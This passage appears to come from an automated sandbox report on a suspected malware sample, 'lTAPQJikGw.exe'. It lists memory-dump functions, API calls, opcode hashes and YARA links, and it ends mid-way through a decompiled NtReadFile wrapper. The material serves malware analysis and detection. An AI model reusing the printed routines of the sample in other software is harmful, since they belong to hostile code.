                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,?,?), ref: 01B3DF1D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID:
                                                                        • API String ID: 1378638983-0
                                                                        • Opcode ID: 93e0bc1182bd2fe4e2d78b069649c856e65fc1b95c277cdaead1f1b7e52929ec
                                                                        • Instruction ID: ca6177d9405406745aecd6a618103a0bec39bd4af7feea8e058d9678a50ddb2b
                                                                        • Opcode Fuzzy Hash: 93e0bc1182bd2fe4e2d78b069649c856e65fc1b95c277cdaead1f1b7e52929ec
                                                                        • Instruction Fuzzy Hash: 831103B58002099FDB10DF99D488BDEFBF8EB88320F14845AE919A3740C374A954CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3FEF0, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 01B3FF55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: fad5cdcd3e960fe09e9b7750524c584590616fd4d7ea2ce73a8b8d2d4c689eb8
                                                                        • Instruction ID: ce2b309f49cb1b3eccb028a99a279256412812b50a366f986fa2ce359c93a7ad
                                                                        • Opcode Fuzzy Hash: fad5cdcd3e960fe09e9b7750524c584590616fd4d7ea2ce73a8b8d2d4c689eb8
                                                                        • Instruction Fuzzy Hash: D21103B6C002089FDB10DF99C589BDEBBF4FB49324F10845AE918A7640C374A954CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3FEF8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 01B3FF55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: f40b4a5a6129ba45e623dbbc509091f7cd6b17e5de0469dbcec97644b9ba384a
                                                                        • Instruction ID: 7963bfbadbe0f05c8ab882bf12266569628b70ab183c87575b028d1c5065a40d
                                                                        • Opcode Fuzzy Hash: f40b4a5a6129ba45e623dbbc509091f7cd6b17e5de0469dbcec97644b9ba384a
                                                                        • Instruction Fuzzy Hash: 1211D3B58002499FDB10DF99C489BDEBBF8FB49324F108459E918A7640C375A554CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,?,?), ref: 01B3DF1D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID:
                                                                        • API String ID: 1378638983-0
                                                                        • Opcode ID: 91f0aed23a6c0883c3764d2b3328536bd97adf5d34539bdb9efd1ea4ed988b18
                                                                        • Instruction ID: 6a558a2f07481c0148cc480d954e4b34672ddf0317053f0bfbc9c093f4369295
                                                                        • Opcode Fuzzy Hash: 91f0aed23a6c0883c3764d2b3328536bd97adf5d34539bdb9efd1ea4ed988b18
                                                                        • Instruction Fuzzy Hash: 5F1115B58002088FDB10DF99D488BDEFBF8FB88320F10841AE915A3740C374A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C39C, Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d20f910721cfbbf7d89f930d0ffbee96aab604d8c6ca2844c67d1089567febc0
                                                                        • Instruction ID: a271ca7b7e524608de692461ed1f633332ae1afcb64bb835082aa2c2b94d01a3
                                                                        • Opcode Fuzzy Hash: d20f910721cfbbf7d89f930d0ffbee96aab604d8c6ca2844c67d1089567febc0
                                                                        • Instruction Fuzzy Hash: 18519375B002198FCB14DFA9C8546AFBBFAFB88214F108429ED09E7340DB749D06CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C390, Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0d11caa3b385829691e2725665d9107ee999f7f34fa999e162e86c6aaf21277
                                                                        • Instruction ID: 7e5d0f7bbe100577e28f535cc6eb3cafeb3d1084c44a9ca702fae89e5d4c3ec6
                                                                        • Opcode Fuzzy Hash: d0d11caa3b385829691e2725665d9107ee999f7f34fa999e162e86c6aaf21277
                                                                        • Instruction Fuzzy Hash: D801D671B056199BCB10DB5D9C94AAFBBBDBFC4154B14442ADC09D3200EB30DD0587AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581D553, Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ffed8f8480c7b0c1efb7779fd9023523ebda6e6bc84f890b0a7ab111d3b1aea
                                                                        • Instruction ID: 3d68f0847e54933ff3ab66052c73bd1c8a90d532f98e7bb9169bf36a833ef968
                                                                        • Opcode Fuzzy Hash: 8ffed8f8480c7b0c1efb7779fd9023523ebda6e6bc84f890b0a7ab111d3b1aea
                                                                        • Instruction Fuzzy Hash: 1E017171B0161A9BCB10DB5DDC84AAFBBBDEFC4254B14852ADC19D3240EB309D05C7AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581B6B0, Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dcfa244486da521b7898a6ad391bddc7106938b1abceddfc3156081f7e0bf27d
                                                                        • Instruction ID: 51855230c831f417c7d609d9f564bf9b8c3f635b6f73e4d858b969ff109eb84e
                                                                        • Opcode Fuzzy Hash: dcfa244486da521b7898a6ad391bddc7106938b1abceddfc3156081f7e0bf27d
                                                                        • Instruction Fuzzy Hash: B91103B59042488FCB10DF99D489BDEFBF8EB49324F14841AE929A7340C375A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C1FB, Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c24f8d2c0e9cb3dc5b26fd5508a0112e24845df1e6066629f2a91824e4acebbb
                                                                        • Instruction ID: e149201fef7089d549b08efca7ca1fdc2b7cca13fede6b1f32c418766a83f2a9
                                                                        • Opcode Fuzzy Hash: c24f8d2c0e9cb3dc5b26fd5508a0112e24845df1e6066629f2a91824e4acebbb
                                                                        • Instruction Fuzzy Hash: E511E2B59042488FCB10DF9AD489BDEFBF8FB49324F14841AE919A7740C375A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C047, Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 88f69f9662c0c39eeeea8715ee76928a031c87e9e7e3f4b55805ffaf50bf5521
                                                                        • Instruction ID: ef247961e7e672898f8f51b6adc1ff4a1d78da2254ddaa55a26c3d32323fb3d0
                                                                        • Opcode Fuzzy Hash: 88f69f9662c0c39eeeea8715ee76928a031c87e9e7e3f4b55805ffaf50bf5521
                                                                        • Instruction Fuzzy Hash: AA01E871840219DFDB14CFA9C9093AEBAF5BB48354F158629EC25EA2A0D3744E84CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C0E3, Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 231ce51cd6c1797d6c1b992e89ba71bd1391503d256dd66e752392a88410e8cd
                                                                        • Instruction ID: 97593639235e5df00cbe161c1f913063e3e8e4724a6abb34da8dfd43a82ff911
                                                                        • Opcode Fuzzy Hash: 231ce51cd6c1797d6c1b992e89ba71bd1391503d256dd66e752392a88410e8cd
                                                                        • Instruction Fuzzy Hash: 3EF08C727041656FA304966AEC84E6BBBFAEBCD265B15817AF548CB310DA308C0183A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C050, Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f553ab54a801a493a26f19d22cfe63c525909989842c4a8d0e3304195be3ad2a
                                                                        • Instruction ID: b929c464e5c12106eb64e9d93532f7db1330aa651e3d008670f7c8fcca741815
                                                                        • Opcode Fuzzy Hash: f553ab54a801a493a26f19d22cfe63c525909989842c4a8d0e3304195be3ad2a
                                                                        • Instruction Fuzzy Hash: 4801FB70840219DFDB14CFAAC4083AEBAF5BF49350F158225EC25EA2A0D7754E40CFD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581C0F0, Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86170535783447978ad6ffa1a46e7b432851b1703542e37bebb1fff852bff22b
                                                                        • Instruction ID: d6b4862175046deb494d1bca4793a9c81ef9c001160ee66111e08329c44dd9bb
                                                                        • Opcode Fuzzy Hash: 86170535783447978ad6ffa1a46e7b432851b1703542e37bebb1fff852bff22b
                                                                        • Instruction Fuzzy Hash: B3E039727041246F5304DA6AEC84C6BBBEEEBCD6B4751817AF608CB310DA309C0186A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581FD98, Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93042d4c70bbbc9504b3e85b28d5dee1ca4282cc8241f3dd1c0ee3673480f0d8
                                                                        • Instruction ID: 32b036bcfcc47e3f70720b24576fc47a0c06847b7599598218ccec9b25b53ced
                                                                        • Opcode Fuzzy Hash: 93042d4c70bbbc9504b3e85b28d5dee1ca4282cc8241f3dd1c0ee3673480f0d8
                                                                        • Instruction Fuzzy Hash: 04F0DAB0E0420A9FDB54DFA9D841AAEBBF9FF48300F5045A9E918E7301D77499118BE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581F458, Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: caed44d35335519b1696d6e83b7100b911087279efb77cb1de5d55592a9947de
                                                                        • Instruction ID: 0bfd721e304a697e12aa6881adf03e96347a2c4f878965b095a3b6d2efedfd81
                                                                        • Opcode Fuzzy Hash: caed44d35335519b1696d6e83b7100b911087279efb77cb1de5d55592a9947de
                                                                        • Instruction Fuzzy Hash: 9FE0EE70D0A208EFCB14DFA8D440AADBBB9AB48305F20C1AADD49E3300D7359A90DF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581DE50, Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd283220dcf9bb36ef6cdba3c41c488a28553cc2ce744cb66f95df6d7c2300ee
                                                                        • Instruction ID: 7d8d2acd03997a3e4106c0b945760ec3a93008eb872bb5221ecf124bed88f7a1
                                                                        • Opcode Fuzzy Hash: cd283220dcf9bb36ef6cdba3c41c488a28553cc2ce744cb66f95df6d7c2300ee
                                                                        • Instruction Fuzzy Hash: AAE01A34926208DFC740DFA8D444A5CBBF8AB08615F5040E9DC09D7310D630AE50CB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581D878, Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d09e996a256e973885c09df0a5bac9770b451be083aadbd093d6601312757ef
                                                                        • Instruction ID: 0425f1b9f8274f25feeebab06f2be9c40e2c7f9f1577bd19e959793106529021
                                                                        • Opcode Fuzzy Hash: 8d09e996a256e973885c09df0a5bac9770b451be083aadbd093d6601312757ef
                                                                        • Instruction Fuzzy Hash: D6E0ECB095620CEFCB44EFA8D4467ADBFB8AB48215F2044A98D49D3340EB305A548B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581FD40, Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ddbcf9a06f5d7960230911b41960bfc2c958e9d32326d9d92d08c8517839755
                                                                        • Instruction ID: 428126247be63e293e0e943f91ce47c5d2116dc96b3cd104602b1c48701a3bb6
                                                                        • Opcode Fuzzy Hash: 5ddbcf9a06f5d7960230911b41960bfc2c958e9d32326d9d92d08c8517839755
                                                                        • Instruction Fuzzy Hash: 91E04FB0D00209DFC740DFB9C50576EBBF4BF08204F108565C414E7321E7748A008F95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581F4A8, Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03e2694200127d17da65b3cfe839d398836e03d393bf182458f251c6d5a81cf9
                                                                        • Instruction ID: 37d233f259e44fff71610a5d85485bc8685463a17b7a7fe3c64423516ae52ece
                                                                        • Opcode Fuzzy Hash: 03e2694200127d17da65b3cfe839d398836e03d393bf182458f251c6d5a81cf9
                                                                        • Instruction Fuzzy Hash: 88D0923142660CABC340AFB5FE0F61E7FA8EB06317F018064F90AC2510DE750952CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581F778, Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db693d518c85b6bc0663441d48210f51260ef1b43aa63ef9c09d2511677afe38
                                                                        • Instruction ID: d42e870b16b8e3ff29faed00ed9708c6f889398536c0f229b84668a5e4d135aa
                                                                        • Opcode Fuzzy Hash: db693d518c85b6bc0663441d48210f51260ef1b43aa63ef9c09d2511677afe38
                                                                        • Instruction Fuzzy Hash: 7FD017B0C0030EAFCB50EFB8880579EBBF8AB04200F10487AC914E2201E7B846008FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581FE38, Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7ea70942260b652793f9b040fb51036e6fbfed94469f6ef112825230b41b30e
                                                                        • Instruction ID: f748ec7e92165244163dc38df06e1c895388692f5ad1ea826697417651f98112
                                                                        • Opcode Fuzzy Hash: c7ea70942260b652793f9b040fb51036e6fbfed94469f6ef112825230b41b30e
                                                                        • Instruction Fuzzy Hash: 5CD0123221420C5E4B80EF99E840C5277DDBB24B10700C436FE44CB021E722E964D765
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00ECB7D5, Relevance: 2.2, Instructions: 2168COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656995303.0000000000EC2000.00000002.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.656989132.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6dbac2cf2ff30fc7ef16d2640312e8f1034f07da4ae2d4f994c1ea1f4f00d3e
                                                                        • Instruction ID: ef00a1b4b92e4e40c8e7dacb25a5dcc5bd2fa1afa0736f838f52b809d649703a
                                                                        • Opcode Fuzzy Hash: c6dbac2cf2ff30fc7ef16d2640312e8f1034f07da4ae2d4f994c1ea1f4f00d3e
                                                                        • Instruction Fuzzy Hash: FC03796144E7C25FC3138B349D35AE1BFB1AE5321432D89CFD4C18F4A3E22A5A5AD762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01870448, Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%!l
                                                                        • API String ID: 0-4161362926
                                                                        • Opcode ID: f2ad8503ae5ffc8113738878b387bbab5c495658f3ff74708aa78ad6a10184cb
                                                                        • Instruction ID: e234cff04f6040be46c3a5057038dbecff5ff8a0d8805caa9de0a59201a4fdec
                                                                        • Opcode Fuzzy Hash: f2ad8503ae5ffc8113738878b387bbab5c495658f3ff74708aa78ad6a10184cb
                                                                        • Instruction Fuzzy Hash: 08B19D30B012149FDB18DF68D594BAEBBF6AF8A304F2540A9E505EB3A1CB75DD05CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 058123C0, Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -
                                                                        • API String ID: 0-2547889144
                                                                        • Opcode ID: a0ea4a2820ab766978afdfe7f4c4b66f25346649e1a1fdd85797dd368ecf12a4
                                                                        • Instruction ID: 674a52a8223683e68731178e05d274a9f598dfc8c269fda30c5c338c3dc3149e
                                                                        • Opcode Fuzzy Hash: a0ea4a2820ab766978afdfe7f4c4b66f25346649e1a1fdd85797dd368ecf12a4
                                                                        • Instruction Fuzzy Hash: D34142B1E056188BEB5DCF6B8C40789FAF7BFC9200F14C1BAD84DAA254DB700A858F15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3C2B0, Relevance: .5, Instructions: 522COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e69552cab48756c93cfd96956bc595211b1a8fb274531d8863cf33eb483c08b
                                                                        • Instruction ID: 5b188d19af31492b6f123fb1feb448562f292c829fecdce3e1d5aa1a97bc6107
                                                                        • Opcode Fuzzy Hash: 7e69552cab48756c93cfd96956bc595211b1a8fb274531d8863cf33eb483c08b
                                                                        • Instruction Fuzzy Hash: EC528CB1500B06CFD718EF54E8C81993BB2FB8A318F915309C1616BAD9D3B465EACF64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B39990, Relevance: .3, Instructions: 265COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ec847175407dc884a7f6bf1ddd00c1a9dacf7d59e1df4dd97541282132d1061
                                                                        • Instruction ID: 3595f3b0aacd4c2c13ce6d1fda5e811f90c1305514512a2a6f7518ad83a0be50
                                                                        • Opcode Fuzzy Hash: 1ec847175407dc884a7f6bf1ddd00c1a9dacf7d59e1df4dd97541282132d1061
                                                                        • Instruction Fuzzy Hash: 84A18432E0061A8FCF09DFB5C9845DDBBB2FFC5300B1581AAE905BB265DB31A955CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05812160, Relevance: .1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 125ecf0b2c4474992edcabf17b6ed208d9fc06e972d02b6cdf6240d353d90651
                                                                        • Instruction ID: b292ef7abbcc2455e984b0d649c20ec81bd6ae832adf6e25c37f63b7e65a3658
                                                                        • Opcode Fuzzy Hash: 125ecf0b2c4474992edcabf17b6ed208d9fc06e972d02b6cdf6240d353d90651
                                                                        • Instruction Fuzzy Hash: 32516974E092498FDB44DF79E48069E7BF2FBC8318F04C829D1099B264EF7429069FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05812170, Relevance: .1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed4acb02c180cb5848d3b341d7c5140c0a2478a12496d1367e9d6e4d1eb2b8ba
                                                                        • Instruction ID: cfc576be3fda2868f137f201797f3f18ebd40ab28d3b6ba628bbb8640b374065
                                                                        • Opcode Fuzzy Hash: ed4acb02c180cb5848d3b341d7c5140c0a2478a12496d1367e9d6e4d1eb2b8ba
                                                                        • Instruction Fuzzy Hash: 14514774E052498BDB44DFB9E48069EBBF2FB88318F05C829D1099B264EF7469068B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 058123B1, Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 101ed9b75cc0a8d3b66eaee37af386b0943f4bd297278f678e7e0f916f8f6fd0
                                                                        • Instruction ID: 1a8040325721efdd6666634c4696c1f45f9e349ecf39d55d639c4212b205965a
                                                                        • Opcode Fuzzy Hash: 101ed9b75cc0a8d3b66eaee37af386b0943f4bd297278f678e7e0f916f8f6fd0
                                                                        • Instruction Fuzzy Hash: 3B417471E156588BEB5DCF6B8C4078AFAF7BFC9200F04C1BAD84CAA254DB7009858F15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: lTAPQJikGw.exe PID: 6192 Parent PID: 7056 lTAPQJikGw.exeCOMMON

                                                                        Executed Functions

                                                                        Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 24%
                                                                        			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}









                                                                        0x004182ae
                                                                        0x00418262
                                                                        0x00418263
                                                                        0x0041826f
                                                                        0x00418277
                                                                        0x00418282
                                                                        0x0041829d
                                                                        0x004182a5
                                                                        0x004182a9
                                                                        0x004182b0
                                                                        0x004182b1
                                                                        0x004182b3
                                                                        0x004182b6
                                                                        0x004182bf
                                                                        0x004182bf
                                                                        0x004182cf
                                                                        0x004182d5
                                                                        0x004182d7
                                                                        0x004182d8
                                                                        0x004182d9
                                                                        0x004182d9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: B=A$B=A
                                                                        • API String ID: 2738559852-2767357659
                                                                        • Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                                        • Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
                                                                        • Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                                        • Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 21%
                                                                        			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
